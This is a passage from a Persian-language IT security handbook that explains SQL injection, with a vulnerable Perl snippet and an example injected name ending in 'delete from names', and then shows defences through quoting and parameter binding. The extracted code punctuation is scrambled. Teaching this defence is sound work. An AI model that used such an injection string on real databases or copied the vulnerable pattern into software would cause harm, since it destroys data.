‫ﺩﺭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺍﻳﻦ ﻓﺎﻳﻞ ﺭﺍ ﺑﺎﺯ ﻣﻲﻛﻨﺪ‪ ،‬ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ ﺭﺍ ﻣﻲﺧﻮﺍﻧﺪ‪ ،‬ﻭ ﺳﭙﺲ ﺩﺭﺧﻮﺍﺳﺖ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ ﻣﻲﻓﺮﺳﺘﺪ‪.‬‬
‫ﺑﻪ ﻳﺎﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺍﮔﺮ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ ﻭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﻫﺮﺩﻭ ﺭﻭﻱ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺑﻌﻨﻮﺍﻥ ﻣﻴﺰﺑﺎﻥ ﻗـﺮﺍﺭ ﻧﺪﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ‪،‬‬
‫ﺁﻥ ﻧﺎﻣﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺍﺯ ﻃﺮﻳﻖ ﺷﺒﻜﻪ ﻣﻴﺎﻥ ﻣﻴﺰﺑﺎﻧﻬﺎ ﺗﺒﺎﺩﻝ ﺧﻮﺍﻫﻨﺪ ﺷﺪ‪ .‬ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺑﺎﻳﺪ ﺍﺯ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ‬
‫ﻛﻪ ﺑﺘﻮﺍﻧﺪ ﺍﺗﺼﺎﻻﺕ ﺧﺎﺭﺟﻲ ﺭﺍ ﺑﺼﻮﺭﺕ ﺭﻣﺰﺷﺪﻩ ﻭ ﻳﺎ ﻧﻮﻉ ﺩﻳﮕﺮﻱ ﺍﺯ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺑﭙﺬﻳﺮﺩ ﺗﺎ ﺩﺭ ﺁﻥ ﻧﺎﻣﻬﺎﻱ ﻛـﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰﻫـﺎﻱ ﻋﺒـﻮﺭ‬
‫ﺑﺼﻮﺭﺕ ﻣﺘﻦﺳﺎﺩﻩ ﻣﻨﺘﻘﻞ ﻧﺸﻮﻧﺪ‪.‬‬

‫ﺑﺮﺍﻱ ﻧﻤﺎﻳﺶ ﻣﺴﺘﻘﻴﻢ ﻣﺤﺘﻮﻳﺎﺕ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ ﺍﺯ ﻏﺮﺑﺎﻝﺳﺎﺯﻱ ﻭ ﮔﻴﻮﻣﻪﮔﺬﺍﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‬
‫ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﭘﻴﺸﺘﺮ ﺫﻛﺮ ﺷﺪ‪ ،‬ﺑﺴﻴﺎﺭ ﻣﻬﻢ ﺍﺳﺖ ﻛﻪ ﻫﻤﺔ ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ ﺍﺯ ﻃﺮﻑ ﻛﺎﺭﺑﺮﺍﻥ ﻭﺍﺭﺩ ﻣﻲﺷﻮﺩ ﻏﺮﺑﺎﻝ ﺷﻮﻧﺪ ﺗﺎ ﻣﻄﻤﺌﻦ ﺷـﻮﻳﻢ ﻛـﻪ‬
‫ﺩﺭ ﺁﻧﻬﺎ ﺗﻨﻬﺎ ﻛﺎﺭﺍﻛﺘﺮﻫﺎﻱ ﻣﺠﺎﺯ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﻫﻨﮕﺎﻡ ﻛﺎﺭ ﺑﺎ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ‪ ،SQL‬ﺑﺮﺭﺳﻲ ﺩﺍﺩﻩﻫﺎﻱ ﻭﺭﻭﺩﻱ ﻛﺎﺭﺑﺮﺍﻥ ﭘﻴﺶ ﺍﺯ ﻓﺮﺳﺘﺎﺩﻥ‬
‫ﺁﻧﻬﺎ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺍﻫﻤﻴﺖ ﻣﻀﺎﻋﻔﻲ ﭘﻴﺪﺍ ﻣﻲﻛﻨﺪ‪ .‬ﺩﻟﻴﻞ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺑﺎﻳﺪ ﺟﻠﻮﻱ ﺍﻳﺠﺎﺩ ﺩﺳﺘﻮﺭﺍﺕ ﺩﻟﺨـﻮﺍﻩ ‪ SQL‬ﺗﻮﺳـﻂ‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﻭ ﺍﺭﺳﺎﻝ ﺁﻧﻬﺎ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ‪ SQL‬ﮔﺮﻓﺘﻪ ﺷﻮﺩ‪.‬‬
‫ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺍﮔﺮ ﻳﻚ ﻓﺮﻡ ﻭﺏ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺍﺯ ﻛﺎﺭﺑﺮ ﻧﺎﻡ ﺍﻭ ﺭﺍ ﺑﭙﺮﺳﺪ ﻭ ﺳﭙﺲ ﺍﻳـﻦ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ ﺩﺭ ﭘﺎﻳﮕـﺎﻩ ﺩﺍﺩﻩ ﺫﺧﻴـﺮﻩ ﻛﻨـﺪ‪ ،‬ﻗﺎﺑـﻞ‬
‫ﭘﻴﺶﺑﻴﻨﻲ ﺍﺳﺖ ﻛﻪ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﺍﻱ ﻛﻪ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﺪ ﺑﻪ ﺍﺣﺘﻤﺎﻝ ﺯﻳﺎﺩ ﻧﺎﻡ ﺍﻳﻦ ﻓﺮﺩ ﺭﺍ ﺍﺯ ﻳﻚ ﻓﻴﻠﺪ ﺧﻮﺍﻫـﺪ ﮔﺮﻓـﺖ‪ ،‬ﺁﻧـﺮﺍ ﺩﺭ ﻳـﻚ‬
‫ﻣﺘﻐﻴﺮ ﻣﺜﻞ ‪ $name‬ﺫﺧﻴﺮﻩ ﺧﻮﺍﻫﺪ ﻛﺮﺩ‪ ،‬ﻭ ﺳﭙﺲ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻦ ﻣﺘﻐﻴﺮ ﻳﻚ ﺩﺳﺘﻮﺭ ‪ SQL‬ﺧﻮﺍﻫﺪ ﺳﺎﺧﺖ‪ .‬ﺑﻪ ﺍﻳﻦ ﻗﻄﻌـﻪﺑﺮﻧﺎﻣـﺔ ‪perl‬‬
‫ﺗﻮﺟﻪ ﻛﻨﻴﺪ‪:‬‬
‫;)’‪$name = param(‘name‬‬
‫;)”;)’‪sql_send(“insert into names (name) value (‘$name‬‬
‫‪٣٧١‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﻣﺘﺄﺳﻔﺎﻧﻪ ﺍﻳﻦ ﺭﻭﺵ ﭼﻨﺪﺍﻥ ﺍﻳﻤﻦ ﻧﻴﺴﺖ‪ ،‬ﭼﺮﺍﻛﻪ ﺍﮔﺮ ﻛﺴﻲ ﺑﺎ ﺳﺎﺧﺘﺎﺭ ﺑﺮﻧﺎﻣﺔ ﺷﻤﺎ ﺁﺷﻨﺎﻳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ ،‬ﻣﻲﺗﻮﺍﻧﺪ ﻭﺭﻭﺩﻱ ﺧﺎﺻﻲ ﺭﺍ ﺑﻌﻨـﻮﺍﻥ‬
‫ﻧﺎﻡ ﻭﺍﺭﺩ ﻓﻴﻠﺪ ﻣﺮﺑﻮﻃﻪ ﻛﻨﺪ ﻛﻪ ﺑﺎﻋﺚ ﺷﻮﺩ ﻳﻚ ﻓﺮﻣﺎﻥ ‪ SQL‬ﺑﻪ ﺧﻮﺍﺳﺖ ﺍﻭ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭﺁﻳﺪ‪ .‬ﺍﻳﻦ ﻧﺎﻡ ﺭﺍ ﺩﺭ ﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ‪:‬‬

‫;‪John Smith’)”; delete from names‬‬


‫ﺯﻣﺎﻧﻴﻜﻪ ﺑﺮﺍﻱ ﺳﺎﺧﺘﻦ ﺩﺳﺘﻮﺭ ‪ SQL‬ﺍﺯ ﺍﻳﻦ ﻧﺎﻡ ﺍﺳﺘﻔﺎﺩﻩ ﺷﻮﺩ‪ ،‬ﺭﺷﺘﺔ ﺣﺎﺻﻠﻪ ﺩﺭ ﺣﻘﻴﻘﺖ ﺑﻌﻨﻮﺍﻥ ﺳﻪ ﺩﺳﺘﻮﺭ ﺗﻔﺴﻴﺮ ﺧﻮﺍﻫﺪ ﺷﺪ‪ :‬ﺍﻭﻝ ﺩﺳـﺘﻮﺭ‬
‫ﺩﺭﺝ ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ‪ ،‬ﺩﻭﻡ ﺩﺳﺘﻮﺭﻱ ﻛﻪ ﻣﻨﺠﺮ ﺑﻪ ﺣﺬﻑ ﻫﻤﺔ ﺩﺍﺩﻩﻫﺎ ﺩﺭ ﺟﺪﻭﻝ ‪ names‬ﻣﻲﺷﻮﺩ‪ ،‬ﻭ ﺳﻮﻡ ﺩﺳﺘﻮﺭﻱ ﻛﻪ ﺣﺎﻭﻱ ﻳﻚ ﺍﺷـﺘﺒﺎﻩ‬
‫ﮔﺮﺍﻣﺮﻱ ﺍﺳﺖ‪:‬‬

‫;)’ ;‪Insert into names (name) value (‘John Smith’)”; delete from names‬‬
‫ﺑﻴﺸﺘﺮ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ‪ SQL‬ﺩﺭﺻﻮﺭﺕ ﺩﺭﻳﺎﻓﺖ ﭼﻨﻴﻦ ﻣﺘﻨﻲ ﺑﻌﻨﻮﺍﻥ ﻭﺭﻭﺩﻱ‪ ،‬ﻳﻚ ﻗﻠﻢ ﺩﺍﺩﻩ ﺭﺍ ﻭﺍﺭﺩ ﺟﺪﻭﻝ ‪ names‬ﻣﻲﻛﻨﻨﺪ‪ ،‬ﺳﭙﺲ‬
‫ﺗﻤﺎﻡ ﺩﺍﺩﻩﻫﺎﻱ ﺁﻥ ﺟﺪﻭﻝ ﺭﺍ ﭘﺎﻙ ﻣﻲﻧﻤﺎﻳﻨﺪ‪ ،‬ﻭ ﭘﺲ ﺍﺯ ﺁﻥ ﻳﻚ ﺧﻄﺎﻱ ‪ SQL‬ﮔﺰﺍﺭﺵ ﻣﻲﺩﻫﻨﺪ‪.‬‬
‫ﻻ ﺩﺍﺩﻩﻫﺎﻱ ﻭﺭﻭﺩﻱ ﺭﺍ ﺑﻪ ﺩﻗﺖ ﻏﺮﺑـﺎﻝ ﻣـﻲﻛﻨﻴـﺪ‪،‬‬
‫ﺭﻭﺵ ﻣﺤﺎﻓﻈﺖ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎ ﺍﺯ ﺍﻳﻦ ﺩﺳﺘﻪ ﺍﺯ ﺣﻤﻼﺕ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﺍﻭ ﹰ‬
‫‪٢٣٣‬‬
‫ﺛﺎﻧﻴﹰﺎ ﺗﻤﺎﻡ ﺍﻃﻼﻋﺎﺕ ﻏﺮﺑﺎﻝﺷﺪﻩ ﺭﺍ ﭘﻴﺶ ﺍﺯ ﻓﺮﺳﺘﺎﺩﻥ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ SQL‬ﺑﻪ ﻧﺤﻮ ﻣﻨﺎﺳﺒﻲ ﮔﻴﻮﻣﻪﮔﺬﺍﺭﻱ ﻣﻲﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﺑﻬﺘﺮﻳﻦ ﺭﻭﺵ ﺑﺮﺍﻱ ﮔﻴﻮﻣﻪﮔﺬﺍﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺗﺎﺑﻊ ﺍﺳﺖ ﻛﻪ ﻫﻤﻮﺍﺭﻩ ﻫﻨﮕﺎﻡ ﻓﺮﺳﺘﺎﺩﻩﺷﺪﻥ ﻫﺮ ﺭﺷﺘﻪ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ SQL‬ﺑﺼﻮﺭﺕ‬
‫ﻣﺠﺰﺍ ﻓﺮﺍﺧﻮﺍﻧﻲ ﺷﻮﺩ‪ .‬ﺍﮔﺮ ﺷﻤﺎ ﺍﺯ ﺯﺑﺎﻥ ‪ perl‬ﻭ ﻳﻚ ﺑﺴﺘﺔ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ‪ DBI‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪ ،‬ﺑﻴﺸﺘﺮ ﮔﺮﺩﺍﻧﻨـﺪﻩﻫـﺎﻱ ﭘﺎﻳﮕـﺎﻩ ﺩﺍﺩﻩ ﻳـﻚ ﺭﻭﺵ‬
‫ﮔﻴﻮﻣﻪﮔﺬﺍﺭﻱ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺑﺮﺍﻱ ﺷﻤﺎ ﺍﻧﺠﺎﻡ ﺩﻫﺪ ﻭ ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺁﻥ ﺑﺼﻮﺭﺕ ﺯﻳﺮ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪:‬‬

‫‪# $dbh is a DBI object that represents a handle to an open database connection‬‬
‫;))’‪$qname = $dbh->quote(param(‘name‬‬
‫;)”)‪$dbh->do(“insert into name (name) value($qname‬‬
‫ﺭﻭﺵ ﺩﻳﮕﺮ ﺁﻥ ﺍﺳﺖ ﻛﻪ ‪query‬ﻫﺎﻱ ‪ SQL‬ﺭﺍ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪ binding‬ﻣﺘﻐﻴﺮﻫﺎ‪ ،‬ﭘﻴﺶﺗﺮﺟﻤﻪ ﻧﻤﺎﻳﻴﺪ‪ .‬ﺍﻳﻦ ﺭﻭﺵ ﺷﻤﺎ ﺭﺍ ﻗﺎﺩﺭ ﻣﻲﻛﻨﺪ ﻛﻪ‬
‫ﺑﺘﻮﺍﻧﻴﺪ ‪query‬ﻫﺎﻱ ‪ SQL‬ﺭﺍ ﺑﺠﺎﻱ ﻣﺘﻐﻴﺮﻫﺎﻱ ﺣﻘﻴﻘﻲ ﺑﺎ ﺟﺎﻳﮕﺎﻫﻬﺎﻱ ﺁﻥ ﻣﺘﻐﻴﻴﺮﻫﺎ ﺗﺮﺟﻤﻪ ﻧﻤﺎﻳﻴﺪ‪ .‬ﺑﺮﺍﻱ ﻧﻤﻮﻧﻪ‪ ،‬ﺩﺭ ﻣﺜﺎﻝ ﻗﺒﻞ ﻣـﻲﺗـﻮﺍﻥ‬
‫‪ query‬ﺭﺍ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﻭﺍﺳﻂ ﻓﺮﺿﻲ ‪ SQL‬ﺍﻧﺠﺎﻡ ﺩﺍﺩ ﻛﻪ ﺍﺯ ﻋﻼﻣﺖ @ ﺑﻌﻨﻮﺍﻥ ﺟﺎﻳﮕﺎﻩ ﻣﺘﻐﻴﺮﻫﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ‪:‬‬

‫;)”)@( ‪$func = sql_compile(“insert into name (name) value‬‬


‫ﺣﺎﻝ ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺑﺎ ﻳﻚ ﺗﺎﺑﻊ ﺩﻳﮕﺮ ﻧﻴﺰ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ‪:‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫;)'‪$name = param('name‬‬
‫‪sql_bind($func,1,$name); # bind the variable name to the first variable‬‬
‫‪sql_exec($func); # execute the bound function‬‬
‫ﺍﮔﺮ ﺍﺯ ﺑﺴﺘﺔ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ‪ DBI‬ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﻣﻌﻤﻮ ﹰ‬
‫ﻻ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﻳﻦ ﺗﺎﺑﻊ ﺭﺍ ﺑﺼﻮﺭﺕ ﺯﻳﺮ ﺑﻨﻮﻳﺴﻴﺪ‪:‬‬

‫‪# Insertion example‬‬


‫;)'‪$name = param('name‬‬
‫;)‪$dbh->do(“insert into name (name) value (?)”, undef, $name‬‬
‫‪# Selection example‬‬
‫;)”? = ‪$sth = $dbh->prepare(“select * from name where id‬‬
‫;)‪$sth->execute($name‬‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺨﺘﻠﻒ‪ ،‬ﮔﺮﺍﻣﺮ ﺩﺳﺘﻮﺭﺍﺕ ﻭ ﻭﺍﺳﻄﻬﺎﻱ ﺑﺮﻧﺎﻣﻪﺍﻱ ﻣﺘﻔﺎﻭﺗﻲ ﺑﺮﺍﻱ ﺗﺮﺟﻤﻪ‪ ،binding ،‬ﻭ ﺍﺟﺮﺍﻱ ‪query‬ﻫﺎﻱ ‪ SQL‬ﺩﺍﺭﻧﺪ‪.‬‬

‫‪233 Quoting‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٣٧٢‬‬

‫ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻣﺤﺘﻮﺍ‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﺷﻤﺎ ﭼﮕﻮﻧﻪ ﻣﺤﺘﻮﻳﺎﺕ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﺭﺍ ﺑﻪﺭﻭﺯ ﻣﻲﻛﻨﻨﺪ؟ ﺩﺭ ﺍﻭﻟﻴﻦ ﺭﻭﺯﻫﺎﻳﻲ ﻛﻪ ﺷﺒﻜﺔ ﺟﻬﺎﻧﻲ ﻭﺏ ﺁﻏﺎﺯ ﺑﻪ ﻛـﺎﺭ ﻛـﺮﺩﻩ ﺑـﻮﺩ‬
‫ﺑﻴــﺸﺘﺮ ﻣﺤﺘﻮﺍﻫــﺎ ﺗﻮﺳــﻂ ﺑﺮﻧﺎﻣــﻪﻧﻮﻳــﺴﺎﻥ ﻭ ﺗﻮﺳــﻌﻪﺩﻫﻨــﺪﮔﺎﻥ ﻭ ﺑﻮﺳــﻴﻠﺔ ﭘﺮﺩﺍﺯﺷــﮕﺮﻫﺎﻱ ﻣــﺘﻦ ﻭ ﻳــﺎ ‪ HTML‬ﺑــﺼﻮﺭﺕ ﻣــﺴﺘﻘﻴﻢ ﺭﻭﻱ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻭﺏ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻣﺪﻧﺪ؛ ﺍﻣـﺎ ﺍﻣـﺮﻭﺯﻩ ﺑﻴـﺸﺘﺮ ﻣﺤﺘﻮﺍﻫـﺎ ﺭﻭﻱ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﺷﺨـﺼﻲ ﻭ ‪Mac‬ﻫـﺎ ﺍﻳﺠـﺎﺩ ﻭ ﺳـﭙﺲ ﺭﻭﻱ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ‪ upload‬ﻣﻲﺷﻮﻧﺪ‪ .‬ﺍﻳﻦ ‪ upload‬ﺩﺭ ﺣﻘﻴﻘﺖ ﻳﻚ ﻋﻤﻠﻴﺎﺕ ﺍﻧﺘﻘﺎﻝ ﻓﺎﻳﻞ ﺍﺳﺖ ﻭ ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﻫﻢ ﻣﻲﺗﻮﺍﻧـﺪ ﻣـﻮﺭﺩ‬
‫ﺍﺳﺘﺮﺍﻕﺳﻤﻊ ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ‪ .‬ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﭘﻴﺸﺘﺮ ﺑﺤﺚ ﺷﺪ‪ ،‬ﻛﺎﺭﺑﺮﺍﻥ ﺑﺎﻳﺪ ﻣﻠﺰﻡ ﺷﻮﻧﺪ ﻛﻪ ﺍﺯ ﻳـﻚ ﺳﻴـﺴﺘﻢ ﺍﻧﺘﻘـﺎﻝ ﻓﺎﻳـﻞ ﺍﻳﻤـﻦ ﻧﻈﻴـﺮ ‪،scp‬‬
‫‪ WebDAV‬ﺭﻭﻱ ‪ ،SSL‬ﻭ ﻳﺎ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻧﺎﺍﻣﻦ ﺍﻧﺘﻘﺎﻝ ﻓﺎﻳﻞ ﺭﻭﻱ ﻳﻚ ﺷﺒﻜﺔ ﺧﺼﻮﺻﻲ ﻣﺠﺎﺯﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‪ .‬ﺩﺭ ﺑﺮﺧﻲ ﻣﻮﺍﺭﺩ ﻣﻤﻜـﻦ‬
‫ﺍﺳﺖ ﺍﻧﺘﻘﺎﻝ ﻓﻴﺰﻳﻜﻲ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺍﺯ ﻃﺮﻳﻖ ﻭﺳﺎﻳﻠﻲ ﻫﻤﭽﻮﻥ ﺩﻳﺴﻜﻬﺎﻱ ‪ floppy‬ﻭ ﻳﺎ ﺩﻳﺴﻜﻬﺎﻱ ﻓﺸﺮﺩﻩ ﺗﺮﺟﻴﺢ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪.‬‬

‫ﺍﻳﻤﻦﺳﺎﺯﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ‬


‫ﺍﮔﺮ ﺷﻤﺎ ﺩﺭ ﺳﻤﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﺧﻮﺩ ﺍﺯ ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﺣﻔﺎﻇـﺖ ﺍﺯ ﺧـﻮﺩ ﭘﺎﻳﮕـﺎﻩ ﺩﺍﺩﻩ ﻫـﻢ ﺿـﺮﻭﺭﻱ ﺍﺳـﺖ؛ ﻭ‬
‫ﭼﻨﺎﻧﭽﻪ ﺍﻳﻦ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ ﻫﻢ ﺭﻭﻱ ﻫﻤﺎﻥ ﻣﻴﺰﺑﺎﻧﻲ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭﺁﻣﺪﻩ ﻛﻪ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﻭﺏ ﺭﻭﻱ ﺁﻥ ﺍﺳـﺖ‪ ،‬ﺁﻥ ﭘﺎﻳﮕـﺎﻩ ﻧﺒﺎﻳـﺪ ﺩﺳﺘﺮﺳـﻲ‬
‫ﺷﺒﻜﻪﺍﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﺍﮔﺮ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ ﺭﻭﻱ ﻳﻚ ﻣﻴﺰﺑﺎﻥ ﻣﺠﺰﺍ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭﺁﻣﺪﻩ ﺍﺳﺖ ﻣﻼﺣﻈﺎﺕ ﺯﻳﺮ ﺭﺍ ﻣﺪﻧﻈﺮ ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪:‬‬
‫ﺁﺭﺍﻳﺶ ﻫﻨﺪﺳﻲ ﺷﺒﻜﻪ ﻭ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺧﻮﺩ ﺭﺍ ﺑﮕﻮﻧﻪﺍﻱ ﺗﻨﻈﻴﻢ ﻛﻨﻴﺪ ﻛﻪ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ ﺑﺮﺍﻱ ﺍﻓﺮﺍﺩ ﺧﺎﺭﺝ ﺍﺯ‬ ‫•‬
‫ﺳﺎﺯﻣﺎﻥ ﻧﺎﻣﻤﻜﻦ ﺑﺎﺷﺪ‪ .‬ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺭﻭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﺍﺯ ﺩﻭ ﻛﺎﺭﺕ ﺷﺒﻜﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ‪ :‬ﻳﻜﻲ ﺑـﺮﺍﻱ ﺍﺗـﺼﺎﻝ ﺑـﻪ‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﻭ ﺩﻳﮕﺮﻱ ﺑﺮﺍﻱ ﺍﺗﺼﺎﻝ ﺑﻪ ﻳﻚ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻛﻮﭼﻚ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ ﻣﺘﺼﻞ ﮔﺮﺩﺩ‪ .‬ﺍﻳﻦ ﺩﻳـﻮﺍﺭﺓ‬
‫ﺁﺗﺶ ﺑﺎﻳﺪ ﺑﮕﻮﻧﻪﺍﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺷﺪﻩ ﺑﺎﺷﺪ ﻛﻪ ﺗﻨﻬﺎ ‪query‬ﻫﺎﻱ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ ﺑﺘﻮﺍﻧﻨﺪ ﻣﻴﺎﻥ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﻭﺏ ﻭ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ‬
‫ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ ﺗﺒﺎﺩﻝ ﺷﻮﻧﺪ‪.‬‬
‫ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ ﺑﺮﺍﻱ ﻭﺭﻭﺩ ﻛﺎﺭﺑﺮﺍﻥ ﻣﺴﺪﻭﺩ ﺍﺳﺖ‪ .‬ﻏﻴﺮ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ﺍﺯ ﭘﺎﻳﮕﺎﻩ‬ ‫•‬
‫ﺩﺍﺩﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﺗﻨﻬﺎ ﻛﺴﺎﻧﻲ ﻛﻪ ﺑﺎﻳﺪ ﺑﺘﻮﺍﻧﻨﺪ ﺑﻪ ﺍﻳﻦ ﺳﻴﺴﺘﻢ ﻭﺍﺭﺩ ﺷﻮﻧﺪ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ ﺭﺍﻫﺒﺮﺍﻥ ﺳﻴﺴﺘﻢ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ‪.‬‬
